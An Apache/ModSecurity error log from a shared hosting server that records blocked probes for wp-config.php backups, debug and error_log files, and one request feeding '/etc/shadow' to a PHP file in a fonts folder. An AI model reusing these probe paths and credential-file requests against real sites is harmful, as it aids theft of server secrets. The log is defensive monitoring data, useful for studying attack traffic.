[Mon May 11 16:09:12.972089 2026] [security2:error] [pid 1319953:tid 1319970] [client 208.84.101.73:38588] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/wp-content/debug.log"] [unique_id "agHjCOSQ-m-m0ukSShuQvgAAAU8"]
[Mon May 11 16:09:12.974861 2026] [security2:error] [pid 1319998:tid 1320021] [client 208.84.101.73:38594] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/wp-config.php.old"] [unique_id "agHjCKt2WtvoFr7xvGzkHgAAAJU"]
[Mon May 11 16:09:12.975064 2026] [security2:error] [pid 1319998:tid 1320021] [client 208.84.101.73:38594] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/wp-config.php.old"] [unique_id "agHjCKt2WtvoFr7xvGzkHgAAAJU"]
[Mon May 11 16:09:12.976148 2026] [security2:error] [pid 1319953:tid 1319971] [client 208.84.101.73:38590] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/wp-config.php"] [unique_id "agHjCOSQ-m-m0ukSShuQvwAAAVA"]
[Mon May 11 16:09:12.976339 2026] [security2:error] [pid 1319953:tid 1319971] [client 208.84.101.73:38590] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/wp-config.php"] [unique_id "agHjCOSQ-m-m0ukSShuQvwAAAVA"]
[Mon May 11 16:09:13.576983 2026] [security2:error] [pid 1320398:tid 1320419] [client 208.84.101.73:38644] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/wp-config.php~"] [unique_id "agHjCeJEyNRN152ArOSbnwAAAFM"]
[Mon May 11 16:09:13.577242 2026] [security2:error] [pid 1320398:tid 1320419] [client 208.84.101.73:38644] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/wp-config.php~"] [unique_id "agHjCeJEyNRN152ArOSbnwAAAFM"]
[Mon May 11 16:09:13.577457 2026] [security2:error] [pid 1319885:tid 1319898] [client 208.84.101.73:38668] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /.wp-config.php.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/.wp-config.php.swp"] [unique_id "agHjCVchVQ3tCn0m9OpnWQAAAQg"]
[Mon May 11 16:09:13.577616 2026] [security2:error] [pid 1319885:tid 1319898] [client 208.84.101.73:38668] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/.wp-config.php.swp"] [unique_id "agHjCVchVQ3tCn0m9OpnWQAAAQg"]
[Mon May 11 16:09:13.577715 2026] [security2:error] [pid 1319886:tid 1319931] [client 208.84.101.73:38658] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/wp-config.php.save"] [unique_id "agHjCay-5-wpj6Sx56aoywAAABQ"]
[Mon May 11 16:09:13.577915 2026] [security2:error] [pid 1319886:tid 1319931] [client 208.84.101.73:38658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/wp-config.php.save"] [unique_id "agHjCay-5-wpj6Sx56aoywAAABQ"]
[Mon May 11 16:09:14.182849 2026] [security2:error] [pid 1319953:tid 1319971] [client 208.84.101.73:38590] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjCOSQ-m-m0ukSShuQvwAAAVA"]
[Mon May 11 16:09:14.183265 2026] [security2:error] [pid 1319998:tid 1320021] [client 208.84.101.73:38594] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjCKt2WtvoFr7xvGzkHgAAAJU"]
[Mon May 11 16:09:14.481060 2026] [security2:error] [pid 1319953:tid 1319970] [client 208.84.101.73:38588] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjCOSQ-m-m0ukSShuQvgAAAU8"]
[Mon May 11 16:09:14.521150 2026] [security2:error] [pid 1319886:tid 1319908] [client 208.84.101.73:38620] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjCKy-5-wpj6Sx56aoygAAAAY"]
[Mon May 11 16:09:14.974867 2026] [security2:error] [pid 1320398:tid 1320419] [client 208.84.101.73:38644] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjCeJEyNRN152ArOSbnwAAAFM"]
[Mon May 11 16:09:14.984373 2026] [security2:error] [pid 1319885:tid 1319898] [client 208.84.101.73:38668] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjCVchVQ3tCn0m9OpnWQAAAQg"]
[Mon May 11 16:09:15.026883 2026] [security2:error] [pid 1319886:tid 1319931] [client 208.84.101.73:38658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjCay-5-wpj6Sx56aoywAAABQ"]
[Mon May 11 16:09:40.906640 2026] [security2:error] [pid 1319998:tid 1320006] [client 170.106.35.137:56818] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agHjJKt2WtvoFr7xvGzkQwAAAIY"], referer: http://tchatbooster.fr
[Mon May 11 16:09:42.958131 2026] [security2:error] [pid 1411099:tid 1411101] [client 43.157.98.187:37060] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHjJg-Qm4vhlWBPlMiy2gAAAAA"]
[Mon May 11 16:09:45.584755 2026] [ssl:error] [pid 1411055:tid 1411064] (EAI 2)Name or service not known: [client 17.241.227.129:33460] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:09:45.585285 2026] [ssl:error] [pid 1411055:tid 1411064] AH01941: stapling_renew_response: responder error
[Mon May 11 16:10:20.512058 2026] [security2:error] [pid 1411201:tid 1411252] [client 43.156.117.41:32800] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tct-telecom.fr"] [uri "/"] [unique_id "agHjTPy_GXSWIKeli0vrogAAAIY"]
[Mon May 11 16:10:38.619253 2026] [security2:error] [pid 1320674:tid 1320698] [client 43.156.117.41:49658] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tct-telecom.fr"] [uri "/"] [unique_id "agHjXqO9RdIr1DwxYR2inAAAAMg"], referer: http://www.tct-telecom.fr
[Mon May 11 16:10:41.469432 2026] [security2:error] [pid 1411099:tid 1411110] [client 43.156.117.41:53122] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agHjYQ-Qm4vhlWBPlMizWgAAAAo"], referer: https://www.tct-telecom.fr/
[Mon May 11 16:10:56.076920 2026] [authz_core:error] [pid 1411055:tid 1411070] [client 176.120.22.46:60173] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/l10n/error_log, referer: https://krakoukas.com/wp-includes/l10n/
[Mon May 11 16:11:00.778217 2026] [authz_core:error] [pid 1411099:tid 1411113] [client 47.128.28.124:53518] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/Requests/library/error_log
[Mon May 11 16:11:15.202285 2026] [authz_core:error] [pid 1411055:tid 1411077] [client 176.120.22.46:58512] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/error_log, referer: https://krakoukas.com/wp-includes/rest-api/
[Mon May 11 16:11:21.534827 2026] [authz_core:error] [pid 1411055:tid 1411073] [client 176.120.22.46:63356] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/endpoints/error_log, referer: https://krakoukas.com/wp-includes/rest-api/endpoints/
[Mon May 11 16:11:27.999258 2026] [authz_core:error] [pid 1411099:tid 1411121] [client 176.120.22.46:51650] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/fields/error_log, referer: https://krakoukas.com/wp-includes/rest-api/fields/
[Mon May 11 16:11:34.389979 2026] [authz_core:error] [pid 1411099:tid 1411106] [client 176.120.22.46:56371] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/search/error_log, referer: https://krakoukas.com/wp-includes/rest-api/search/
[Mon May 11 16:11:47.126746 2026] [authz_core:error] [pid 1412074:tid 1412097] [client 176.120.22.46:65456] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sitemaps/providers/error_log, referer: https://krakoukas.com/wp-includes/sitemaps/providers/
[Mon May 11 16:11:59.995456 2026] [authz_core:error] [pid 1411201:tid 1411254] [client 176.120.22.46:58507] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/lib/error_log, referer: https://krakoukas.com/wp-includes/sodium_compat/lib/
[Mon May 11 16:12:06.400444 2026] [authz_core:error] [pid 1411055:tid 1411063] [client 176.120.22.46:63609] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/namespaced/error_log, referer: https://krakoukas.com/wp-includes/sodium_compat/namespaced/
[Mon May 11 16:12:07.410408 2026] [ssl:error] [pid 1411201:tid 1411257] (EAI 2)Name or service not known: [client 124.156.200.223:60802] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:12:07.410835 2026] [ssl:error] [pid 1411201:tid 1411257] AH01941: stapling_renew_response: responder error
[Mon May 11 16:12:07.661855 2026] [security2:error] [pid 1411201:tid 1411257] [client 124.156.200.223:60802] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/"] [unique_id "agHjt_y_GXSWIKeli0vshAAAAIs"], referer: http://www.happy-baby-box.fr
[Mon May 11 16:12:09.750767 2026] [ssl:error] [pid 1412074:tid 1412096] (EAI 2)Name or service not known: [client 124.156.200.223:37390] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:12:09.750825 2026] [ssl:error] [pid 1412074:tid 1412096] AH01941: stapling_renew_response: responder error
[Mon May 11 16:12:10.057240 2026] [security2:error] [pid 1412074:tid 1412096] [client 124.156.200.223:37390] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agHjujJnyuKVXoStDhautAAAAFQ"], referer: https://www.happy-baby-box.fr/
[Mon May 11 16:12:12.741999 2026] [authz_core:error] [pid 1411099:tid 1411112] [client 176.120.22.46:52050] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/namespaced/Core/error_log, referer: https://krakoukas.com/wp-includes/sodium_compat/namespaced/Core/
[Mon May 11 16:12:19.226915 2026] [authz_core:error] [pid 1411099:tid 1411115] [client 176.120.22.46:56739] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/src/error_log, referer: https://krakoukas.com/wp-includes/sodium_compat/src/
[Mon May 11 16:12:25.592975 2026] [authz_core:error] [pid 1411055:tid 1411066] [client 176.120.22.46:61498] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/src/Core/error_log, referer: https://krakoukas.com/wp-includes/sodium_compat/src/Core/
[Mon May 11 16:12:31.964616 2026] [authz_core:error] [pid 1411201:tid 1411269] [client 176.120.22.46:49741] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/src/Core32/error_log, referer: https://krakoukas.com/wp-includes/sodium_compat/src/Core32/
[Mon May 11 16:12:51.007765 2026] [authz_core:error] [pid 1411099:tid 1411111] [client 176.120.22.46:63759] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/theme-compat/error_log, referer: https://krakoukas.com/wp-includes/theme-compat/
[Mon May 11 16:12:57.121520 2026] [security2:error] [pid 1411055:tid 1411058] [client 43.164.197.117:42978] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agHj6UWKUxpmnkK7zHx1kQAAAQE"], referer: http://www.tchatbooster.fr
[Mon May 11 16:12:57.363545 2026] [authz_core:error] [pid 1411201:tid 1411246] [client 176.120.22.46:52045] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/widgets/error_log, referer: https://krakoukas.com/wp-includes/widgets/
[Mon May 11 16:13:54.274150 2026] [security2:error] [pid 1411201:tid 1411248] [client 86.105.185.182:37373] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHkIvy_GXSWIKeli0vtVgAAAII"], referer: https://www.piregwan-genesis.com/
[Mon May 11 16:14:10.950223 2026] [authz_core:error] [pid 1411099:tid 1411108] [client 176.120.22.46:58992] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-admin/includes/error_log, referer: https://krakoukas.com/wp-admin/includes/
[Mon May 11 16:14:45.505361 2026] [security2:error] [pid 1411055:tid 1411062] [client 43.130.60.195:43452] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "culturesvoile.com"] [uri "/"] [unique_id "agHkVUWKUxpmnkK7zHx2XgAAAQU"], referer: http://culturesvoile.com
[Mon May 11 16:15:43.641671 2026] [ssl:error] [pid 1411099:tid 1411101] (EAI 2)Name or service not known: [client 140.248.41.30:16200] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:15:43.642328 2026] [ssl:error] [pid 1411099:tid 1411101] AH01941: stapling_renew_response: responder error
[Mon May 11 16:15:43.642504 2026] [ssl:error] [pid 1412074:tid 1412078] (EAI 2)Name or service not known: [client 146.75.166.55:16163] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:15:43.642525 2026] [ssl:error] [pid 1412074:tid 1412078] AH01941: stapling_renew_response: responder error
[Mon May 11 16:17:04.931773 2026] [security2:error] [pid 1411099:tid 1411123] [client 216.73.216.110:12842] ModSecurity: Warning. Matched phrase "etc/shadow" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/shadow found within ARGS:filesrc: /etc/shadow,v"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHk4A-Qm4vhlWBPlMi2OQAAABc"]
[Mon May 11 16:17:04.932655 2026] [security2:error] [pid 1411099:tid 1411123] [client 216.73.216.110:12842] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHk4A-Qm4vhlWBPlMi2OQAAABc"]
